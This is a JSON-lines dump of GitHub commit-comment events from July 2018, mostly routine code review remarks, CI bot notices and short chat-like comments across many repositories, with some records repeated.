{"id":"8039117148","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29890830,"position":null,"line":null,"path":null,"commit_id":"5da627c19b60bda2ae73b3359504a72f6a8256f5","created_at":"2018-07-30T17:22:19Z","updated_at":"2018-07-30T17:22:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1032](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1032).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1032-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T17:22:19Z"}
{"id":"8039126224","type":"CommitCommentEvent","actor":{"login":"IMMORTALGODKING"},"repo":{"name":"IMMORTALGODKING/resulted.number.1"},"payload":{"comment":{"id":29890846,"position":null,"line":null,"path":null,"commit_id":"d9512482a718183a611f186c64465b68d501c876","created_at":"2018-07-30T17:23:58Z","updated_at":"2018-07-30T17:23:58Z","author_association":"OWNER","body":"Hey babe bet you can't do this"}},"created_at":"2018-07-30T17:23:58Z"}
{"id":"8039129636","type":"CommitCommentEvent","actor":{"login":"LamiaT"},"repo":{"name":"LamiaT/CSE370_Project_LovCafe"},"payload":{"comment":{"id":29890852,"position":null,"line":null,"path":null,"commit_id":"20ad7f8be8a91c843217beeac97cee02c3cef67b","created_at":"2018-07-30T17:24:37Z","updated_at":"2018-07-30T17:24:37Z","author_association":"OWNER","body":"PROBLEMS STILL EXISTING:\r\n1. Dish being added 4 times\r\n2. Have to delete 2 times for a dish to be deleted"}},"created_at":"2018-07-30T17:24:37Z"}
{"id":"8039131282","type":"CommitCommentEvent","actor":{"login":"egucciar"},"repo":{"name":"domwashburn/semantic-release"},"payload":{"comment":{"id":29890854,"position":27,"line":142,"path":"index.js","commit_id":"1117aa589699fbb3df2f8e100c01ef2bc3d85809","created_at":"2018-07-30T17:24:55Z","updated_at":"2018-07-30T17:24:55Z","author_association":"NONE","body":"hey, I am trying to run this branch, i know semantic-release developer is not working on it currently and this work will go to the wayside once its done, but we need the feature sooner than later.\r\n\r\nAny chance i could pick your brain? I'm unsure why my release is still failing badly, so wondering if you were able to get this to work too. "}},"created_at":"2018-07-30T17:24:55Z"}
{"id":"8039132307","type":"CommitCommentEvent","actor":{"login":"sethbrenith"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":29890855,"position":5,"line":4546,"path":"lib/Runtime/ByteCode/ByteCodeSerializer.cpp","commit_id":"e16792c186ef7a88f8a6be4a7045f5ca6a6405dd","created_at":"2018-07-30T17:25:07Z","updated_at":"2018-07-30T17:25:07Z","author_association":"MEMBER","body":"I updated this one to use `>=`. It is just making sure we have enough room for the metadata `count` and `extraSlots`, which are then used to compute the full size of `result->GetDataSize()` in the second assertion."}},"created_at":"2018-07-30T17:25:07Z"}
{"id":"8039134235","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29890856,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T17:25:28Z","updated_at":"2018-07-30T17:25:28Z","author_association":"NONE","body":"But do you understand the issue?\r\n\r\nIn this very line you create an object `new Player (new Mark (''))`.\r\n\r\nThis particular object cannot be returned by $game, because it's not passed over to $game anywhere - and not passing it is fine.\r\n\r\nHowever, game must be able to tell that there is no winner.\r\n\r\nSo while returning null is not best, it's at least possible.\r\n\r\nReturn null for now, and we'll seek later a better alternative."}},"created_at":"2018-07-30T17:25:28Z"}
{"id":"8039135044","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":29890857,"position":3,"line":5,"path":"setup.py","commit_id":"7f9aa2b1477aaf411ae5dba382f0e7681d9925c9","created_at":"2018-07-30T17:25:37Z","updated_at":"2018-07-30T17:25:37Z","author_association":"OWNER","body":"mngfjhjgjmjhkkjbk,mgkyjmjgkljoloullhhhklujh"}},"created_at":"2018-07-30T17:25:37Z"}
{"id":"8039135715","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-backup"},"payload":{"comment":{"id":29890859,"position":96,"line":96,"path":"admin/class-boldgrid-backup-admin-cron-test.php","commit_id":"88323b06530798bf52a17e048b237406386c545d","created_at":"2018-07-30T17:25:44Z","updated_at":"2018-07-30T17:25:44Z","author_association":"MEMBER","body":"You may want to use \"$config_file_exists\", to indicate the value is a boolean result of a file existence check."}},"created_at":"2018-07-30T17:25:44Z"}
{"id":"8039138824","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29890868,"position":24,"line":26,"path":"tests/TicTacToeTest.php","commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-30T17:26:19Z","updated_at":"2018-07-30T17:26:19Z","author_association":"NONE","body":"Misses `$this->`."}},"created_at":"2018-07-30T17:26:19Z"}
{"id":"8039156932","type":"CommitCommentEvent","actor":{"login":"trytoforget"},"repo":{"name":"trytoforget/kidtoyshop.github.io"},"payload":{"comment":{"id":29890913,"position":null,"line":null,"path":null,"commit_id":"6c6a61bbbe3fbb4c11a79b2ffcad5e9b259e653e","created_at":"2018-07-30T17:29:46Z","updated_at":"2018-07-30T17:29:46Z","author_association":"OWNER","body":"ádasdadadas"}},"created_at":"2018-07-30T17:29:46Z"}
{"id":"8039157033","type":"CommitCommentEvent","actor":{"login":"glimberg"},"repo":{"name":"zerotier/ZeroTierOne"},"payload":{"comment":{"id":29890914,"position":null,"line":null,"path":null,"commit_id":"d724af6a99b3698bd396801f0b1ba64a5378fc94","created_at":"2018-07-30T17:29:47Z","updated_at":"2018-07-30T17:29:47Z","author_association":"MEMBER","body":"Because bandwidth in South America is expensive and few VPS hosting providers support IPv6"}},"created_at":"2018-07-30T17:29:47Z"}
{"id":"8039160586","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29890923,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:30:28Z","updated_at":"2018-07-30T17:30:28Z","author_association":"CONTRIBUTOR","body":"Can you think of a way to avoid having this hardcoded?  It seems like we could pass it into `FilesystemDicomClient.__init__`."}},"created_at":"2018-07-30T17:30:28Z"}
{"id":"8039161315","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29890925,"position":12,"line":51,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:30:36Z","updated_at":"2018-07-30T17:30:36Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-30T17:30:36Z"}
{"id":"8039161832","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29890928,"position":null,"line":null,"path":null,"commit_id":"f7208a1ba1113bb9641d9c81e05bcb4de3a160cf","created_at":"2018-07-30T17:30:42Z","updated_at":"2018-07-30T17:30:42Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/f7208a1ba1113bb9641d9c81e05bcb4de3a160cf/index.html"}},"created_at":"2018-07-30T17:30:42Z"}
{"id":"8039164445","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29890933,"position":null,"line":null,"path":null,"commit_id":"6f2723aac8c1511cb12cbe1c414e8eddbf4d9302","created_at":"2018-07-30T17:31:13Z","updated_at":"2018-07-30T17:31:13Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2953 of 2953 tests passed, 2 test warnings)\n\nMessages:\n\n * 2 tests had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f2723aac8c1511cb12cbe1c414e8eddbf4d9302-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f2723aac8c1511cb12cbe1c414e8eddbf4d9302-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T17:31:13Z"}
{"id":"8039166772","type":"CommitCommentEvent","actor":{"login":"methi1999"},"repo":{"name":"All-AI/all-ai.github.io"},"payload":{"comment":{"id":29890939,"position":null,"line":null,"path":null,"commit_id":"86829e0e86a92bb53fecfc72400d81848c62b4f9","created_at":"2018-07-30T17:31:39Z","updated_at":"2018-07-30T17:31:39Z","author_association":"CONTRIBUTOR","body":"Added profile photo"}},"created_at":"2018-07-30T17:31:39Z"}
{"id":"8039167541","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890942,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T17:31:47Z","updated_at":"2018-07-30T17:31:47Z","author_association":"NONE","body":"I did a quick backport in the OIT core and no issue and no crash.\r\nI just added the call to `UpdateAEG() ` and removed the `if (EGHack==1)`"}},"created_at":"2018-07-30T17:31:47Z"}
{"id":"8039172773","type":"CommitCommentEvent","actor":{"login":"angad128"},"repo":{"name":"angad128/djangoTutorial"},"payload":{"comment":{"id":29890956,"position":null,"line":null,"path":null,"commit_id":"5d3bc0cc7bacdf140603ee94731d40d468a7a9dc","created_at":"2018-07-30T17:32:49Z","updated_at":"2018-07-30T17:32:49Z","author_association":"OWNER","body":"command -- \"django-admin start project myWebsite\"\r\n"}},"created_at":"2018-07-30T17:32:49Z"}
{"id":"8039173651","type":"CommitCommentEvent","actor":{"login":"FahmidaFaiza"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29890958,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-30T17:33:00Z","updated_at":"2018-07-30T17:33:00Z","author_association":"NONE","body":"https://www.linkedin.com/in/fahmida-faiza-196570163\r\nhttps://novoresume.com/a/fahmidafaizamistian.1"}},"created_at":"2018-07-30T17:33:00Z"}
{"id":"8039177093","type":"CommitCommentEvent","actor":{"login":"garengputra8"},"repo":{"name":"avramit/Instahack"},"payload":{"comment":{"id":29890967,"position":null,"line":null,"path":null,"commit_id":"3a9591fbe6c287fc1f28202a12ce31407ad5206b","created_at":"2018-07-30T17:33:39Z","updated_at":"2018-07-30T17:33:39Z","author_association":"NONE","body":"Susilestari08_"}},"created_at":"2018-07-30T17:33:39Z"}
{"id":"8039177320","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29890970,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:33:41Z","updated_at":"2018-07-30T17:33:41Z","author_association":"CONTRIBUTOR","body":"I guess one reason not to do this, is because we were trying to have the various `__init__` methods for each client class take the same arguments.  Perhaps we should abandon this, and instead accept the fact that different classes will have different parameters passed into their `__init__`?\r\n\r\nI think the main goal is to make it easy to switch between client classes; but it doesn't need to be as easy as only changing a class name.\r\n\r\nIf we went down this route, we could drop the client_ae, pacs_url, pacs_port, and timeout arguments from the file system __init__."}},"created_at":"2018-07-30T17:33:41Z"}
{"id":"8039180730","type":"CommitCommentEvent","actor":{"login":"sripaulgit"},"repo":{"name":"Kentico/cloud-sample-app-react"},"payload":{"comment":{"id":29890979,"position":null,"line":null,"path":null,"commit_id":"28549bab115ac482627ddc19d7897859f10ac087","created_at":"2018-07-30T17:34:21Z","updated_at":"2018-07-30T17:34:21Z","author_association":"COLLABORATOR","body":"@Simply007 Sorry was out on vacation and didn't get to it. Thank you!"}},"created_at":"2018-07-30T17:34:21Z"}
{"id":"8039181932","type":"CommitCommentEvent","actor":{"login":"Firgof"},"repo":{"name":"headprogrammingczar/StarRuler2-Source"},"payload":{"comment":{"id":29890981,"position":5,"line":40,"path":"README.md","commit_id":"0ccc445bad3a10be215e5c25140d18dca731f6dc","created_at":"2018-07-30T17:34:34Z","updated_at":"2018-07-30T17:34:34Z","author_association":"NONE","body":"typo: suiable -> suitable"}},"created_at":"2018-07-30T17:34:34Z"}
{"id":"8039183566","type":"CommitCommentEvent","actor":{"login":"focbenz"},"repo":{"name":"ebean-orm/ebean"},"payload":{"comment":{"id":29890983,"position":null,"line":null,"path":null,"commit_id":"42d83705b79e31f24d2f6facd9f37ec06a23f746","created_at":"2018-07-30T17:34:52Z","updated_at":"2018-07-30T17:34:52Z","author_association":"CONTRIBUTOR","body":"If Eclipse does not get any grammar constraint through (DTD or XML schema) in an XML file a warning is getting displayed.\r\nI added this line (`<!DOCTYPE xml>`) here to avoid that warning: https://github.com/ebean-orm/ebean/commit/81ca26715faca4bcf6a7bb5b8136c7b9e532b990#diff-d19533adc2df32a0b1ad99fae624a4a7"}},"created_at":"2018-07-30T17:34:52Z"}
{"id":"8039196966","type":"CommitCommentEvent","actor":{"login":"MathieuDuponchelle"},"repo":{"name":"MathieuDuponchelle/gst-python"},"payload":{"comment":{"id":29891002,"position":87,"line":87,"path":"examples/plugins/python/mixer.py","commit_id":"6cf081fa115d016f18904829039fbb7c24804ae8","created_at":"2018-07-30T17:37:22Z","updated_at":"2018-07-30T17:37:22Z","author_association":"OWNER","body":"Plenty of room for improvement yes, but this is enough for illustrative purposes, a videomixer in python doesn't really make that much sense anyway :)"}},"created_at":"2018-07-30T17:37:22Z"}
{"id":"8039198147","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891003,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:37:37Z","updated_at":"2018-07-30T17:37:37Z","author_association":"CONTRIBUTOR","body":"Right, currently the tests depend on all the classes having the same args (it loops over a list of classes to create each client). "}},"created_at":"2018-07-30T17:37:37Z"}
{"id":"8039172773","type":"CommitCommentEvent","actor":{"login":"angad128"},"repo":{"name":"angad128/djangoTutorial"},"payload":{"comment":{"id":29890956,"position":null,"line":null,"path":null,"commit_id":"5d3bc0cc7bacdf140603ee94731d40d468a7a9dc","created_at":"2018-07-30T17:32:49Z","updated_at":"2018-07-30T17:32:49Z","author_association":"OWNER","body":"command -- \"django-admin start project myWebsite\"\r\n"}},"created_at":"2018-07-30T17:32:49Z"}
{"id":"8039200513","type":"CommitCommentEvent","actor":{"login":"showell"},"repo":{"name":"synicalsyntax/zulip"},"payload":{"comment":{"id":29891006,"position":null,"line":null,"path":null,"commit_id":"e5730c3114b37fa063e527a90bb8555ab7e84dcf","created_at":"2018-07-30T17:38:06Z","updated_at":"2018-07-30T17:38:06Z","author_association":"NONE","body":"This seems reasonable to me.  Ideally we'd just support all four commands on the server, but then we'd still need to change the client code the way things are currently set up.  If you make a PR for this, I'll merge it, but we might revisit the code a bit when we start supporting autocomplete and start making this work for non-web clients like mobile.\r\n\r\nIf you do go with a server-side fix, then the client code can just have something like this:\r\n\r\n~~~ js\r\nvar simple_commands = ['/day', '/light', '/dark', '/night'];\r\nif (simple_commands.indexOf(content) >= 0) {\r\n    update_setting(content)\r\n    return true;\r\n}"}},"created_at":"2018-07-30T17:38:06Z"}
{"id":"8039202139","type":"CommitCommentEvent","actor":{"login":"zfyilyoh"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29891013,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-30T17:38:25Z","updated_at":"2018-07-30T17:38:25Z","author_association":"NONE","body":"现在几乎已经挂掉了，总是在连接当中，连上了也没有速度，论坛也找不到了，都不知道是什么情况"}},"created_at":"2018-07-30T17:38:25Z"}
{"id":"8039202895","type":"CommitCommentEvent","actor":{"login":"winkj"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29891015,"position":4,"line":16,"path":"device/sensor/sensor.mk","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-30T17:38:34Z","updated_at":"2018-07-30T17:38:34Z","author_association":"OWNER","body":"ooops"}},"created_at":"2018-07-30T17:38:34Z"}
{"id":"8039202990","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":29891016,"position":5,"line":316,"path":"scripts/create_addon","commit_id":"1cdead36238b57b36171fe085900a307dba49376","created_at":"2018-07-30T17:38:35Z","updated_at":"2018-07-30T17:38:35Z","author_association":"CONTRIBUTOR","body":"Why not increment the count?\r\n```\r\n-_count=''\r\n+_count=0\r\n```\r\n```\r\n- _count+='x'\r\n+ _count=$((_count + 1))\r\n```\r\n```\r\n-if [ \"$_count\" != 'x' ]; then\r\n+if [ $_count -ne 0  ]; then \r\n```\r\n?\r\n```\r\nbe more appropriate?"}},"created_at":"2018-07-30T17:38:35Z"}
{"id":"8039205561","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-backup"},"payload":{"comment":{"id":29891022,"position":160,"line":160,"path":"admin/class-boldgrid-backup-admin-cron-test.php","commit_id":"88323b06530798bf52a17e048b237406386c545d","created_at":"2018-07-30T17:39:07Z","updated_at":"2018-07-30T17:39:07Z","author_association":"MEMBER","body":"You may want to swap the two condition checks, so that there may be only one file access if the config file does not exist, rather than two.  Not a big deal though.  You do not need to declare the variable; just place the call in the condition."}},"created_at":"2018-07-30T17:39:07Z"}
{"id":"8039208591","type":"CommitCommentEvent","actor":{"login":"mmanela"},"repo":{"name":"mmanela/chutzpah"},"payload":{"comment":{"id":29891029,"position":null,"line":null,"path":null,"commit_id":"cb8dbf1405ec1e937b0e9776c1fb0f92595be542","created_at":"2018-07-30T17:39:40Z","updated_at":"2018-07-30T17:39:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ok2](https://trello.com/c/xj6Rjtrm/6-ok2)"}},"created_at":"2018-07-30T17:39:40Z"}
{"id":"8039223065","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891055,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:42:17Z","updated_at":"2018-07-30T17:42:17Z","author_association":"CONTRIBUTOR","body":"What about using 'test_dicom_data` as a default for an additional arg? "}},"created_at":"2018-07-30T17:42:17Z"}
{"id":"8039223065","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891055,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:42:17Z","updated_at":"2018-07-30T17:42:17Z","author_association":"CONTRIBUTOR","body":"What about using 'test_dicom_data` as a default for an additional arg? "}},"created_at":"2018-07-30T17:42:17Z"}
{"id":"8039224526","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891061,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T17:42:32Z","updated_at":"2018-07-30T17:42:32Z","author_association":"OWNER","body":"getWhoWon method would have created such an object for returning it, but it will be just another instance of Player with new Mark ('') parameter, therefore a different object than the other parameter of assertTrue. Moreover, we have just two players, not two players and a hidden player ... Funny thing, first time I wrote the null version for this issue."}},"created_at":"2018-07-30T17:42:32Z"}
{"id":"8039198147","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891003,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:37:37Z","updated_at":"2018-07-30T17:37:37Z","author_association":"CONTRIBUTOR","body":"Right, currently the tests depend on all the classes having the same args (it loops over a list of classes to create each client). "}},"created_at":"2018-07-30T17:37:37Z"}
{"id":"8039198147","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891003,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:37:37Z","updated_at":"2018-07-30T17:37:37Z","author_association":"CONTRIBUTOR","body":"Right, currently the tests depend on all the classes having the same args (it loops over a list of classes to create each client). "}},"created_at":"2018-07-30T17:37:37Z"}
{"id":"8039227227","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29891069,"position":null,"line":null,"path":null,"commit_id":"07d7c3d30b8a914f1e32cd0fa8410c2e09dbcf3f","created_at":"2018-07-30T17:43:00Z","updated_at":"2018-07-30T17:43:00Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T17:43:00Z"}
{"id":"8039200513","type":"CommitCommentEvent","actor":{"login":"showell"},"repo":{"name":"synicalsyntax/zulip"},"payload":{"comment":{"id":29891006,"position":null,"line":null,"path":null,"commit_id":"e5730c3114b37fa063e527a90bb8555ab7e84dcf","created_at":"2018-07-30T17:38:06Z","updated_at":"2018-07-30T17:38:06Z","author_association":"NONE","body":"This seems reasonable to me.  Ideally we'd just support all four commands on the server, but then we'd still need to change the client code the way things are currently set up.  If you make a PR for this, I'll merge it, but we might revisit the code a bit when we start supporting autocomplete and start making this work for non-web clients like mobile.\r\n\r\nIf you do go with a server-side fix, then the client code can just have something like this:\r\n\r\n~~~ js\r\nvar simple_commands = ['/day', '/light', '/dark', '/night'];\r\nif (simple_commands.indexOf(content) >= 0) {\r\n    update_setting(content)\r\n    return true;\r\n}"}},"created_at":"2018-07-30T17:38:06Z"}
{"id":"8039228802","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891074,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:43:18Z","updated_at":"2018-07-30T17:43:18Z","author_association":"CONTRIBUTOR","body":"Thats right... maybe we can have the best of both worlds:\r\n\r\n1. A clean API for users\r\n2. Nice parameterized tests for developers\r\n\r\nby adding an intermediate layer in the tests?  I.e., instead of parameterizing over the classes we could parametrize over a list of constructor functions which all take zero arguments?  Or even parameterize over other pytest fixtures if this is possible.  Do you think this could work?"}},"created_at":"2018-07-30T17:43:18Z"}
{"id":"8039202139","type":"CommitCommentEvent","actor":{"login":"zfyilyoh"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29891013,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-30T17:38:25Z","updated_at":"2018-07-30T17:38:25Z","author_association":"NONE","body":"现在几乎已经挂掉了，总是在连接当中，连上了也没有速度，论坛也找不到了，都不知道是什么情况"}},"created_at":"2018-07-30T17:38:25Z"}
{"id":"8039202895","type":"CommitCommentEvent","actor":{"login":"winkj"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29891015,"position":4,"line":16,"path":"device/sensor/sensor.mk","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-30T17:38:34Z","updated_at":"2018-07-30T17:38:34Z","author_association":"OWNER","body":"ooops"}},"created_at":"2018-07-30T17:38:34Z"}
{"id":"8039202990","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":29891016,"position":5,"line":316,"path":"scripts/create_addon","commit_id":"1cdead36238b57b36171fe085900a307dba49376","created_at":"2018-07-30T17:38:35Z","updated_at":"2018-07-30T17:38:35Z","author_association":"CONTRIBUTOR","body":"Why not increment the count?\r\n```\r\n-_count=''\r\n+_count=0\r\n```\r\n```\r\n- _count+='x'\r\n+ _count=$((_count + 1))\r\n```\r\n```\r\n-if [ \"$_count\" != 'x' ]; then\r\n+if [ $_count -ne 0  ]; then \r\n```\r\n?\r\n```\r\nbe more appropriate?"}},"created_at":"2018-07-30T17:38:35Z"}
{"id":"8039205561","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-backup"},"payload":{"comment":{"id":29891022,"position":160,"line":160,"path":"admin/class-boldgrid-backup-admin-cron-test.php","commit_id":"88323b06530798bf52a17e048b237406386c545d","created_at":"2018-07-30T17:39:07Z","updated_at":"2018-07-30T17:39:07Z","author_association":"MEMBER","body":"You may want to swap the two condition checks, so that there may be only one file access if the config file does not exist, rather than two.  Not a big deal though.  You do not need to declare the variable; just place the call in the condition."}},"created_at":"2018-07-30T17:39:07Z"}
{"id":"8039208591","type":"CommitCommentEvent","actor":{"login":"mmanela"},"repo":{"name":"mmanela/chutzpah"},"payload":{"comment":{"id":29891029,"position":null,"line":null,"path":null,"commit_id":"cb8dbf1405ec1e937b0e9776c1fb0f92595be542","created_at":"2018-07-30T17:39:40Z","updated_at":"2018-07-30T17:39:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ok2](https://trello.com/c/xj6Rjtrm/6-ok2)"}},"created_at":"2018-07-30T17:39:40Z"}
{"id":"8039223065","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891055,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:42:17Z","updated_at":"2018-07-30T17:42:17Z","author_association":"CONTRIBUTOR","body":"What about using 'test_dicom_data` as a default for an additional arg? "}},"created_at":"2018-07-30T17:42:17Z"}
{"id":"8039224526","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891061,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T17:42:32Z","updated_at":"2018-07-30T17:42:32Z","author_association":"OWNER","body":"getWhoWon method would have created such an object for returning it, but it will be just another instance of Player with new Mark ('') parameter, therefore a different object than the other parameter of assertTrue. Moreover, we have just two players, not two players and a hidden player ... Funny thing, first time I wrote the null version for this issue."}},"created_at":"2018-07-30T17:42:32Z"}
{"id":"8039227227","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29891069,"position":null,"line":null,"path":null,"commit_id":"07d7c3d30b8a914f1e32cd0fa8410c2e09dbcf3f","created_at":"2018-07-30T17:43:00Z","updated_at":"2018-07-30T17:43:00Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T17:43:00Z"}
{"id":"8039228802","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891074,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:43:18Z","updated_at":"2018-07-30T17:43:18Z","author_association":"CONTRIBUTOR","body":"Thats right... maybe we can have the best of both worlds:\r\n\r\n1. A clean API for users\r\n2. Nice parameterized tests for developers\r\n\r\nby adding an intermediate layer in the tests?  I.e., instead of parameterizing over the classes we could parametrize over a list of constructor functions which all take zero arguments?  Or even parameterize over other pytest fixtures if this is possible.  Do you think this could work?"}},"created_at":"2018-07-30T17:43:18Z"}
{"id":"8039234217","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29891088,"position":19,"line":93,"path":"ipt_connect/IPTdev/views.py","commit_id":"569c4f685f3aa9a78c41ee56016561c1af912360","created_at":"2018-07-30T17:44:19Z","updated_at":"2018-07-30T17:44:19Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-30T17:44:19Z"}
